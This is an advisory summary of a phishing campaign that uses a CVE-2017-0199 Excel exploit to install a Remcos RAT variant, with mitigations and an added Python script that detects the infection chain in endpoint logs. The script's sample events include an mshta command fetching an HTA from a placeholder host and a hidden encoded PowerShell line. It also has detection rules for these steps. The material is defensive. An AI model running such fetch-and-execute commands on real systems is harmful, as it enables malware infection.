New Campaign Uses Remcos RAT to Exploit Victims

Summary:
Fortinet’s FortiGuard Labs recently identified a phishing campaign delivering a new Remcos RAT variant through a malicious Excel document attached to a phishing email. The attack starts with a convincing email carrying the Excel file, disguised as an order form to lure the recipient into opening it. Once opened, the document exploits CVE-2017-0199, a vulnerability that allows remote code execution. Exploiting it makes Excel retrieve an HTA file from a crafted URL, which is then executed through Excel’s DCOM components. The HTA file is heavily obfuscated, using layers of JavaScript, VBScript, Base64, and PowerShell to evade detection. This script then downloads an executable (.exe) file to the %AppData% folder, initiating the core infection sequence.

The exe file unpacks additional files and launches PowerShell commands to establish persistence on the victim’s device by modifying system registry keys, enabling the malware to auto-start on reboot. Remcos deploys numerous anti-analysis techniques, including vectored exception handling, dynamic API resolution, and anti-debugging API calls (like ZwSetInformationThread and ZwQueryInformationProcess), making it difficult for analysts to study the malware’s behavior. Additionally, the malware uses process hollowing to inject itself into a newly created process, Vaccinerende[.]exe, effectively hiding its presence by making it appear as a legitimate process.

Security Officer Comments:
As fileless malware, Remcos operates directly from memory rather than being saved to disk, making detection more challenging. A decrypted settings block embedded in Remcos controls its behavior, including its configuration for communicating with the command-and-control (C&C) server. This settings block defines key parameters such as the C&C server’s IP address, port, and security protocols, and which features are enabled, such as keylogging, screenshot capture, and audio recording. After registering the infected device with the C&C server, Remcos relays detailed system information, including OS version, memory status, user privileges, and device runtime. It also lets the threat actor execute commands for process management, file manipulation, and keystroke logging. Remcos communicates with its C&C server using a structured packet format, with TLS encryption securing the data exchanges. This new Remcos variant demonstrates sophisticated evasion and persistence techniques, combining fileless in-memory operation with multiple obfuscation layers, making it difficult for conventional security tools to detect.

Suggested Corrections:
  • Patch Management: Regularly update and patch software, especially applications like Microsoft Office. In this case, ensuring patches are applied to mitigate vulnerabilities like CVE-2017-0199 will prevent the exploit from executing.
  • Email Security: Deploy advanced email filtering solutions to detect and block phishing emails with malicious attachments. Features like attachment sandboxing, link scanning, and phishing detection in email gateways can significantly reduce the risk.
  • Attachment Controls: Limit the execution of high-risk file types, such as HTA, VBScript, and macros in Office files, especially from unknown senders. Organizations can set policies that disable macros by default and enable them only for trusted documents.
  • Behavioral Analysis: Use endpoint detection and response tools to monitor for suspicious activity, such as unusual PowerShell executions, file drops in sensitive directories, and processes like mshta.exe executing non-native code.
  • Network Segmentation and Monitoring: Segment networks to contain potential infections and monitor for suspicious outbound connections to known malicious IPs and domains. Tools that analyze network traffic for anomalies can help detect and block C&C communications.

IOCs:
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
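To make the Behavioral Analysis recommendation concrete, the following Python script is an added example (not Fortinet’s code and not part of the original advisory). It applies a handful of detection rules to process, file and registry events shaped like the infection chain described in the summary: an Office application spawning mshta.exe, mshta.exe spawning PowerShell with an encoded command, an .exe written under %AppData%, and an autostart registry value being set. The event lines are constructed in a simplified Sysmon-like JSON-lines form; the URL, dropped file name and registry value name are placeholders. The page says only that Remcos modifies registry keys to auto-start, so using the CurrentVersion\Run key as the persistence indicator is an assumption.

```python
"""Behavioural detection over endpoint events, modelled on the Remcos delivery
chain (Excel -> mshta.exe -> PowerShell -> .exe in %AppData% -> autostart key).
Added example with constructed sample events; not real telemetry."""
import json
import re
from collections import defaultdict

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Assumption: a Run/RunOnce value is used as the autostart indicator.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
APPDATA_EXE = re.compile(r"\\AppData\\(Roaming|Local)\\.*\.exe$", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)

# Constructed Sysmon-like events (JSON lines). Hostnames, paths, the URL and the
# dropped file name are placeholders.
SAMPLE_LOG = r"""
{"event":"ProcessCreate","host":"WS01","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","command_line":"EXCEL.EXE","target":""}
{"event":"ProcessCreate","host":"WS01","image":"C:\\Windows\\System32\\mshta.exe","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","command_line":"mshta.exe http://files.example.invalid/stage1.hta","target":""}
{"event":"ProcessCreate","host":"WS01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\mshta.exe","command_line":"powershell.exe -w hidden -enc QUJD","target":""}
{"event":"FileCreate","host":"WS01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"","command_line":"","target":"C:\\Users\\alice\\AppData\\Roaming\\dropped_sample.exe"}
{"event":"RegistryValueSet","host":"WS01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"","command_line":"","target":"HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dropped_sample"}
{"event":"ProcessCreate","host":"WS02","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"powershell.exe -File C:\\scripts\\inventory.ps1","target":""}
"""


def basename(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return (rule_name, chain_stage) hits for a single event.

    Stages: 1 = delivery (Office spawns a script host), 2 = execution
    (mshta/PowerShell), 3 = payload drop, 4 = persistence."""
    hits = []
    img, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmd, target = ev.get("command_line", ""), ev.get("target", "")
    if ev["event"] == "ProcessCreate":
        if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
            hits.append(("office_spawns_script_host", 1))
        if parent == "mshta.exe" and img in {"powershell.exe", "cmd.exe"}:
            hits.append(("mshta_spawns_shell", 2))
        if img == "powershell.exe" and ENCODED_FLAG.search(cmd):
            hits.append(("powershell_encoded_command", 2))
    elif ev["event"] == "FileCreate":
        if img in SCRIPT_HOSTS and APPDATA_EXE.search(target):
            hits.append(("appdata_exe_drop", 3))
    elif ev["event"] == "RegistryValueSet":
        if img in SCRIPT_HOSTS and RUN_KEY.search(target):
            hits.append(("run_key_persistence", 4))
    return hits


def scan(log_text):
    """Evaluate every JSON line; return (alerts, stages_seen_per_host)."""
    alerts = []
    stages = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule, stage in evaluate(ev):
            alerts.append((ev["host"], rule))
            stages[ev["host"]].add(stage)
    return alerts, stages


def hosts_with_full_chain(stages, min_stages=3):
    """Hosts on which at least min_stages distinct chain stages fired. Single
    rule hits happen in normal admin use; several stages on one host do not."""
    return sorted(h for h, s in stages.items() if len(s) >= min_stages)


if __name__ == "__main__":
    found, per_host = scan(SAMPLE_LOG)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("chain on:", hosts_with_full_chain(per_host))
```

Each rule on its own is noisy (administrators do run PowerShell with encoded commands), so the script correlates stages per host and only escalates when several distinct stages of the chain appear on the same machine; the WS02 event, a plain script run from Explorer, produces no alert at all.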
Link(s):
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199